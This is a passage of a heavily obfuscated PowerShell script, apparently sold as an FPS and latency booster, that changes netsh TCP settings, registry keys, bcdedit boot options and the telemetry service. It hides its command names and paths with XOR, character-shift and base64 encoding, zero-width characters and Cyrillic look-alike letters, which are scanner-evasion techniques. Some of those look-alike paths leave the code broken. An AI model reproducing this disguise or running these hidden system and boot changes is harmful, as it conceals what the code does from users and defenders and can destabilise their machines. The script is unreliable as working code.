    NETSh &('I'+$($k4375='G65@rxO=ng61';$b=[byte[]](0x29,0x42);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4375);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &($(-join('Nw'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+6)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+6)%26))}else{[char]$c}}))+('{0}' -f 'p')) &('sE'+"$([char]0x74)") &((-join('gL','o','B'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QUw=')))) CongestiONPROviDer=&('Вb'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cg==')))) | &(([string]::Format('{0}{1}{2}','OU','T-','nU'))+'LL')
    nETsh &(('{0}' -f 'i')+'Nt') T`cP &($(-join('lx'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+'T') &($($k1248='13+,@r4qj4EQsw';$b=[byte[]](0x56,0x5F,0x44,0x6E,0x01);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1248);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'l‍') aUTOTUNiNgLevel=&($($k1020=81;$b=[byte[]](0x3f,0x1e,0x23,0x1c);-join($b|%{[char]($_-bxor$k1020)}))+$(-join('rc'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}}))) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T1V0')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('LU51bEw='))))
    netsH &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x49)))+$(-join('QW'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}}))) &($($k8241='+o%K,GG:)';$b=[byte[]](0x5F,0x2C);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8241);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$(-join('l'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))) &('S'+"$([char]0x65)$([char]0x74)") &($(-join('N'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}}))+$($k6702=97;$b=[byte[]](0x2d,0x0e,0x03,0x20,0x0d);-join($b|%{[char]($_-bxor$k6702)}))) ecncaPabiLItY=&($(-join('ZI'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('YUJMZWQ=')))) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T3V0LU51')))+$($k2987='c^5bZPi';$b=[byte[]](0x2F,0x12);$kb=[System.Text.Encoding]::UTF8.GetBytes($k2987);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
    NeTSh &('I​n‌'+([System.Text.Encoding]::UTF8.GetString([byte[]](0x54)))) &($(-join('x'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Q3A=')))) &($($k2163=61;$b=[byte[]](0x4e);-join($b|%{[char]($_-bxor$k2163)}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZXQ=')))) &((-join('GlO','B','a'))+'l') TimeSTAmpS=&('D'+(-join('is','Ab','leD'))) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T3VULU4=')))+'UlL')
    nEtsH &($($k9063=75;$b=[byte[]](0x22,0x25);-join($b|%{[char]($_-bxor$k9063)}))+$(-join('V'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))) &('ТС'+('{0}' -f 'p')) &($(-join('eQ'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))+$($k3601=101;$b=[byte[]](0x31);-join($b|%{[char]($_-bxor$k3601)}))) &($(-join('Puxkj'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+17)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+17)%26))}else{[char]$c}}))+'L​') rSs=&($($k3726='#?,AYOp}dGJ{y';$b=[byte[]](0x66,0x71,0x6D,0x23,0x35,0x0A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3726);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'d') | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bw==')))+$($k8201='6M!{s4;9pT';$b=[byte[]](0x63,0x19,0x0C,0x35,0x26,0x58,0x57);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8201);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
    nEtsH &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SQ==')))+(-join('n','T'))) &('Tc'+$(-join('N'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))) &((-join('S','e'))+([string]::Format('{0}','t'))) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R0xv')))+('{0}' -f 'BAl')) Rsc=&(('en'+'A'+'bLe')+('{0}' -f 'D')) | &(('{0}' -f 'o')+$($k4870='8vUH4]ZZ5q_+?';$b=[byte[]](0x6D,0x02,0x78,0x06,0x61,0x11,0x36);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4870);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
    NETsH &($($k4604=48;$b=[byte[]](0x59);-join($b|%{[char]($_-bxor$k4604)}))+'nT') T`cP &($(-join('z'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}}))+(-join('e','T'))) &($($k3977='b+r-gw_';$b=[byte[]](0x25);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3977);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('lo'+'BAl')) DcA=&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZQ==')))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x6E,0x41,0x62,0x4C,0x65,0x64)))) | ouT-NuL`l
    NEtsH &($(-join('di'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}}))+'T') &($(-join('q'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))+('C'+'P')) &('Se'+'T') &("$([char]0x47)$([char]0x4C)$([char]0x4F)$([char]0x42)"+$(-join('oz'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))) nETDma=&(([string]::Format('{0}{1}{2}','EN','Ab','lE'))+(-join([char]0x44))) | &(('{0}' -f 'ouT-n')+('{0}{1}{2}' -f 'u','L','l'))

    # 2. neTwOrk AdaPTeR LATENCy STRIPpINg
    &("$([char]0x77)$([char]0x52)$([char]0x69)$([char]0x74)$([char]0x45)"+('-h'+'Os'+'t')) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Wz5dIFN0cmlwcGluZyBQb3dlci1TYXZpbmcgRGVsYXlzIGZyb20gTEFOIENvbnRyb2xsZXIuLi4='))) -FOregrOundColOR wHIte
    $oWqYAML = &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x47,0x65,0x74,0x2D,0x63,0x48,0x69,0x4C,0x64)))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x49,0x74,0x65,0x6D)))) -paTH $(-join('JMNO:\UAUVGO\EwttgpvEqpvtqnUgv\Eqpvtqn\Encuu\{4f36g972-g325-11eg-dhe1-08002dg10318}'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}})) -eRRorACTioN sIlentlYCONtINUe
    foreach ($yUiB in $owqyamL) {
        $gYmrS4s = $YUIb.pspAtH
        if (geT-ITEMPR`OPErTy -paTh $gYmRs4S -Name ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RHJpdmVyRGVzYw=='))) -erROrACtiOn SilenTlyCoNtINUe) {
            &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TkV3LUlUZW1wUk9wZVJ0')))+'Ү') -path $gyMRs4S -NAmE $(-join('*UUUBydaQtluhjyiucudj'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}})) -VaLUe (4 - 4) -prOPeRtyTYPe StrINg -FORce -eRroracTion SilentLYcoNtinUE | &('O‍u​T​'+$($k1664='B1tLF:;';$b=[byte[]](0x6F,0x5F,0x01,0x00,0x0A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1664);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
            New-ItEmPROPeRTY -paTH $GYmRs4s -naME $($k7153='-uSBXe?%';$b=[byte[]](0x07,0x30,0x3D,0x27,0x2A,0x02,0x46,0x60,0x4B,0x13,0x3A,0x21,0x31,0x00,0x51,0x51,0x68,0x01,0x3B,0x27,0x2A,0x0B,0x5A,0x51);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7153);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -VALUE (86 + -86) -pRoPERTYType stRINg -fORcE -erROraCtiON sILeNTLyConTINuE | &($($k4074=238;$b=[byte[]](0x81,0x9b,0xba);-join($b|%{[char]($_-bxor$k4074)}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('LW5VbEw='))))
            New-iteMPrOPERty -pATH $GYmrs4s -namE $($k8713='G>9Ba%^yC0i7QK';$b=[byte[]](0x6D,0x79,0x4B,0x27,0x04,0x4B,0x1B,0x0D,0x2B,0x55,0x1B,0x59,0x34,0x3F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8713);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -VaLue (39 -bxor 39) -PROpeRTytyPe STRInG -FOrCe -ERRORActIoN SILENtLycoNtinUe | &('O‍U‍T‍-‍N‍u‍'+([string]::Format('{0}{1}','L','l')))
            New-ItempRopErTy -PATh $GYmRs4S -naMe ('{0}{1}{2}{3}{4}' -f 'Powe','rDow','nP','l','l') -ValUE (8 + -8) -pROPeRTYtYPE stRiNg -foRCE -errORaCTIOn SILeNTLYCOnTinUe | &('Ou'+(-join([char]0x74, [char]0x2D, [char]0x4E, [char]0x75, [char]0x4C, [char]0x6C)))
        }
    }

    # 3. mouSe & KeYboaRD latEnCy TweAkS
    &($($k1158=212;$b=[byte[]](0x83,0x86,0xbd,0xa0,0x91,0xf9,0x9c,0x9b);-join($b|%{[char]($_-bxor$k1158)}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x73,0x74)))) $(-join('[>] Abzobxpfkd Jlrpb & Hbvylxoa Exoatxob Fkmrq Yrccbop...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}})) -forEgRouNdColor WHiTE
    $eGSJ = ('{0}{1}{2}{3}{4}{5}{6}{7}{8}' -f 'HKCU',':\C','on','trol ','Panel','\Mo','u','s','e')
    &($($k3675=198;$b=[byte[]](0x88,0x83,0x91,0xeb,0x8f);-join($b|%{[char]($_-bxor$k3675)}))+$($k8234='g:l:DyVBTBy=';$b=[byte[]](0x13,0x7F,0x01,0x4A,0x16,0x16,0x26,0x27,0x26,0x36,0x20);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8234);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -PAth $egSj -nAme ('Mous'+'eSpee'+'d') -vAlUe $(17 -bxor 17) -PROPeRTYTYPE STrinG -FOrCE | out`-NULl
    NeW-ItemPrOpERTy -PAtH $eGsj -nAme 'M‌o‍u​s‌e​T‌h​r‌e​s​h‍o​l​d​1‌' -ValUe $(63 + -63) -PrOPERtytyPe StrIng -ForCe | &((-join('OUT','-n','UL'))+'l')
    NEw-ITeMPRopeRtY -pAtH $Egsj -nAMe ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TW91c2VUaHJlc2hvbGQy'))) -VALUE $(86 + -86) -prOPErtYTyPE StRing -FoRcE | &(('{0}' -f 'o')+('{0}{1}{2}' -f 'ut','-nu','ll'))

    $QH2Fp = (-join('HKCU:\C','ontr','ol ','Panel\Ac','cessibil','it','y\Ke','yboard',' Re','spo','nse'))
    if (-not (tE`sT-PAtH $QH2FP)) { &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TkV3')))+('{0}{1}{2}{3}' -f '-','i','te','M')) -PatH $qH2fp -foRCe | &('O​U​T​-​N‌'+$(-join('zqQ'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}}))) }
    &(('{0}' -f 'NeW')+('{0}{1}{2}{3}{4}{5}' -f '-iT','Em','pROp','ER','t','Y')) -PATh 'H‌K‍C‍U‍:‌\‍C‍o‍n‍t​r​o‍l​ ‍P​a‌n‌e‌l‍\‍K​e‍y​b‌o​a‍r‌d​' -NaMe ([string]::Format('{0}{1}{2}{3}{4}{5}','Ke','ybo','a','rdDel','a','y')) -vaLuE $(-35 -bxor -35) -PrOperTyType strIng -FORCE | &(('{0}{1}{2}{3}' -f 'O','U','T-','NU')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TEw='))))
    NEW-iTempropErTy -path 'НКСU:\Соntrоl Раnеl\Кеуbоаrd' -nAME 'K‍e‍y​b‌o‍a‍r‍d‌S‍p‍e‍e‌d‌' -value $(161 - 130) -pROPERtytYPe StRInG -fORce | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1V0')))+"$([char]0x2D)$([char]0x6E)$([char]0x75)$([char]0x4C)$([char]0x6C)")

    $RdiLbq = 'НКLМ:\SҮSТЕМ\СurrеntСоntrоlSеt\Соntrоl\РrіоrіtуСоntrоl'
    &('n‍E‍W‌-‌i​T‍e​m‌P​r‌'+$(-join('detgin'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}}))) -paTh $RDILbQ -nAme $($k8781=199;$b=[byte[]](0x90,0xae,0xa9,0xf4,0xf5,0x97,0xb5,0xae,0xa8,0xb5,0xae,0xb3,0xbe,0x94,0xa2,0xb7,0xa6,0xb5,0xa6,0xb3,0xae,0xa8,0xa9);-join($b|%{[char]($_-bxor$k8781)})) -Value 26 -ProPerTYtyPE dword -foRCe | &('O‍u​t‌-‌n‍u​L‌'+'L‍')

    # 4. mSI Mode aCtiVaTiON (Gpu eXprESS lANE ForCE)
    &($(-join('FArCN-qXb'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+17)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+17)%26))}else{[char]$c}}))+'T') (-join([char]0x5B, [char]0x3E, [char]0x5D, [char]0x20, [char]0x54, [char]0x72, [char]0x61, [char]0x6E, [char]0x73, [char]0x66, [char]0x6F, [char]0x72, [char]0x6D, [char]0x69, [char]0x6E, [char]0x67, [char]0x20, [char]0x47, [char]0x50, [char]0x55, [char]0x20, [char]0x49, [char]0x6E, [char]0x74, [char]0x65, [char]0x72, [char]0x72, [char]0x75, [char]0x70, [char]0x74, [char]0x20, [char]0x50, [char]0x72, [char]0x69, [char]0x6F, [char]0x72, [char]0x69, [char]0x74, [char]0x79, [char]0x20, [char]0x49, [char]0x6E, [char]0x74, [char]0x65, [char]0x72, [char]0x66, [char]0x61, [char]0x63, [char]0x65, [char]0x20, [char]0x74, [char]0x6F, [char]0x20, [char]0x4D, [char]0x53, [char]0x49, [char]0x20, [char]0x4D, [char]0x6F, [char]0x64, [char]0x65, [char]0x2E, [char]0x2E, [char]0x2E)) -FOReGrOuNDcoLor whiTE
    $lcT4at6K = &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R0V0LUNIaUxESQ==')))+$($k6422=44;$b=[byte[]](0x58,0x49,0x41);-join($b|%{[char]($_-bxor$k6422)}))) -Path $($k1197=110;$b=[byte[]](0x26,0x25,0x22,0x23,0x54,0x32,0x3d,0x37,0x3d,0x3a,0x2b,0x23,0x32,0x2d,0x1b,0x1c,0x1c,0x0b,0x00,0x1a,0x2d,0x01,0x00,0x1a,0x1c,0x01,0x02,0x3d,0x0b,0x1a,0x32,0x2b,0x00,0x1b,0x03,0x32,0x3e,0x2d,0x27);-join($b|%{[char]($_-bxor$k1197)})) -recursE -erROrACtIon SILENTLYcoNtinUE | wHEre-OBJecT { $_.PSchIlDnAME -eq $(-join('Zareya Lwnwiapano'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}})) }
    foreach ($KgV7CXV in $lcT4At6K) {
        $aeVLR = ($($KGv7CXv.PSPath) + $(-join('\Otzkxxavz Sgtgmksktz\SkyygmkYomtgrkjOtzkxxavzVxuvkxzoky'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})))
        if (TesT`-PatH ($($KGv7CXv.PSPath) + "$([char]0x5C)$([char]0x49)$([char]0x6E)$([char]0x74)$([char]0x65)$([char]0x72)$([char]0x72)$([char]0x75)$([char]0x70)$([char]0x74)$([char]0x20)$([char]0x4D)$([char]0x61)$([char]0x6E)$([char]0x61)$([char]0x67)$([char]0x65)$([char]0x6D)$([char]0x65)$([char]0x6E)$([char]0x74)")) {
            if (-not (&($($k7990=134;$b=[byte[]](0xd2,0xc3,0xf5,0xf2,0xab);-join($b|%{[char]($_-bxor$k7990)}))+$(-join('bmfT'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))) $AEvlr)) { ne`w-iTem -PAth $AEVlR -fOrcE | &($($k3608=108;$b=[byte[]](0x23,0x19,0x18);-join($b|%{[char]($_-bxor$k3608)}))+$(-join('-iPgG'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}}))) }
            &(('{0}' -f 'n')+'e‌w‌-‌I‌t‍E‍m‌p‌R​O​p‍e‍R‍T​y‍') -pATh $AeVlr -NAme $(-join('DJZJlggfikvu'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})) -VaLUE (43 -bxor 42) -PrOpeRtYTYPe DwOrd -forcE | &($(-join('hnM-g'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+$($k1782=88;$b=[byte[]](0x2d,0x14,0x14);-join($b|%{[char]($_-bxor$k1782)})))
            NeW-itempROPeRty -path $aEVlR -NaMe (-join('Mes','sag','e','N','umberL','i','m','i','t')) -vAluE (-31 / -31) -propertyTYpe dwORd -FOrCE | &($(-join('QWv-PW'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))+$(-join('ww'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+15)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+15)%26))}else{[char]$c}})))
        }
    }

    # 5. DyNAMiC bcdoS peRformANCe TweAKS
    &($($k8858=':PBz@jE5';$b=[byte[]](0x4D,0x02,0x0B,0x0E,0x05);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8858);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([string]::Format('{0}{1}','-HOS','t'))) $(-join('[>] Kntecdsxq LMN Cicdow Mvymu Myxcdkxdc pyb Wsmby-Cdeddob Psh...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+16)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+16)%26))}else{[char]$c}})) -foreGroUNdcolOR WHIte
    &($(-join('DEfGF'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))+'iT') /SET &(('{0}{1}{2}{3}' -f 'uSe','p','lA','T')+'F​o​R‍m‌C​l‌O‍c​K‍') &(('f'+'A')+'l‍S‌E‍') | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1VULW51')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bEw='))))
    bCdEdIT /sEt &($(-join('glVDeoHgbQdP'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}}))+('{0}{1}{2}{3}' -f 'Ic','T','Ic','K')) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('eQ==')))+'еS') | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1VULQ==')))+$(-join('zgxX'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}})))

    # 6. wINDoWS TeLEmETRY & BloatWarE SiLeNCeR
    wRIte-H`osT $(-join('[>] Mknnkpi Ykpfqyu Dcemitqwpf Vgngogvta Tgrqtvkpi Rtqeguugu...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}})) -forEgroUNdcoLOR whITE
    sT`op-SErVICE -nAmE $($k2770='h%l1xM';$b=[byte[]](0x2C,0x4C,0x0D,0x56,0x2C,0x3F,0x09,0x46,0x07);$kb=[System.Text.Encoding]::UTF8.GetBytes($k2770);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -eRRORAcTIoN sIleNtlYContInue
    &($($k1451='v*AQP&YQulZX)2i';$b=[byte[]](0x25,0x4F,0x35,0x7C);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1451);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$($k9808='YWTRNb*M!u';$b=[byte[]](0x0A,0x32,0x06,0x04,0x07,0x01,0x6F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9808);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -NAmE ('{0}{1}{2}{3}' -f 'Di','agT','ra','ck') -sTARtuPType dIsabLed -ErrOractiOn SIlenTLYCoNtiNUe
    $FhZKmesb = 'НКLМ:\SОFТWАRЕ\Роlісіеs\Місrоsоft\Wіndоws\DаtаСоllесtіоn'
    if (-not (&($(-join('f'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))+$($k8406=189;$b=[byte[]](0xf8,0xee,0xe9,0x90,0xed,0xdc,0xe9,0xf5);-join($b|%{[char]($_-bxor$k8406)}))) $FhZKmEsb)) { NeW-iTE`m -PaTH $fhZkmEsb -FOrCe | &((-join('OU','t','-Nu'))+'Ll') }
    &('NеW-іtЕmРRОреRТ'+$(-join('E'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))) -pAth $FHzKmesb -namE 'АllоwТеlеmеtrу' -VaLUE (72 -bxor 72) -ProPERtyTYpE DWORd -FoRce | &('o‍u​T‍'+('{0}{1}' -f '-NuL','l'))

    # 7. preMIUm gENEral fPs bOost & gAMedvr OFf
    WriTE`-hOsT '[​>‌]​ ‍E​l‍e‌v‌a​t​i‌n‌g‍ ‌G​a‌m‍e‍ ​T​h‌r‌e‌a​d​ ‌S‍c​h​e‌d‌u​l‌i‌n‌g‍ ‍p‌a‍r‌a​m​e​t‍e‌r‌s​.‌.‍.‍' -fORegrOundcoLOR whitE
    $SK6h = 'НКLМ:\SОFТWАRЕ\Місrоsоft\Wіndоws NТ\СurrеntVеrsіоn\Мultіmеdіа\SуstеmРrоfіlе'
    &($(-join('qHZ-lW'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}}))+$(-join('ZhkMjkzmOt'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}}))) -PATH $sK6H -namE (-join([char]0x4E, [char]0x65, [char]0x74, [char]0x77, [char]0x6F, [char]0x72, [char]0x6B, [char]0x54, [char]0x68, [char]0x72, [char]0x6F, [char]0x74, [char]0x74, [char]0x6C, [char]0x69, [char]0x6E, [char]0x67, [char]0x49, [char]0x6E, [char]0x64, [char]0x65, [char]0x78)) -VALuE 0xfffFFfFf -PRopERtytYpe dworD -fORce | &((-join([char]0x6F))+('{0}{1}{2}{3}' -f 'uT-','N','ul','L'))
    New-iTEMPropErTY -path $sk6h -NaME (-join([char]0x53, [char]0x79, [char]0x73, [char]0x74, [char]0x65, [char]0x6D, [char]0x52, [char]0x65, [char]0x73, [char]0x70, [char]0x6F, [char]0x6E, [char]0x73, [char]0x69, [char]0x76, [char]0x65, [char]0x6E, [char]0x65, [char]0x73, [char]0x73)) -VaLUe (-65 -bxor -65) -pROPerTyTypE dWord -ForcE | &(([string]::Format('{0}','o'))+$($k8236=126;$b=[byte[]](0x0b,0x2a,0x53,0x30,0x0b,0x32,0x12);-join($b|%{[char]($_-bxor$k8236)})))

    $d6Oy = 'H‌K‍L‍M‌:‍\​S‌O‌F​T‍W‌A‌R‌E​\‍M​i‌c‍r‌o​s‌o​f‍t‍\‍W‍i‌n‍d‍o‌w‍s‌ ‍N‍T‌\‌C‍u‍r‌r‍e​n‌t‌V‍e‌r‍s​i‌o​n‌\‌M‍u‌l‌t​i​m‌e‌d​i‍a​\​S​y‍s‌t​e‍m​P​r‍o‍f‌i‍l‌e‍\​T​a​s‍k‌s‌\​G‍a‍m‌e‌s‍'
    if (&(('{0}' -f 't')+$($k4733=181;$b=[byte[]](0xd0,0xe6,0xe1,0x98,0xc5,0xf4,0xc1,0xdd);-join($b|%{[char]($_-bxor$k4733)}))) $D6OY) {
        New`-ItEmProperTy -PaTh $d6oy -name ('G'+'PU Pr'+'io'+'r'+'i'+'ty') -vaLUe (-72 / -9) -propeRTYTYPe DWord -fORce | &((-join([char]0x4F, [char]0x75, [char]0x74, [char]0x2D))+"$([char]0x4E)$([char]0x75)$([char]0x6C)$([char]0x6C)")
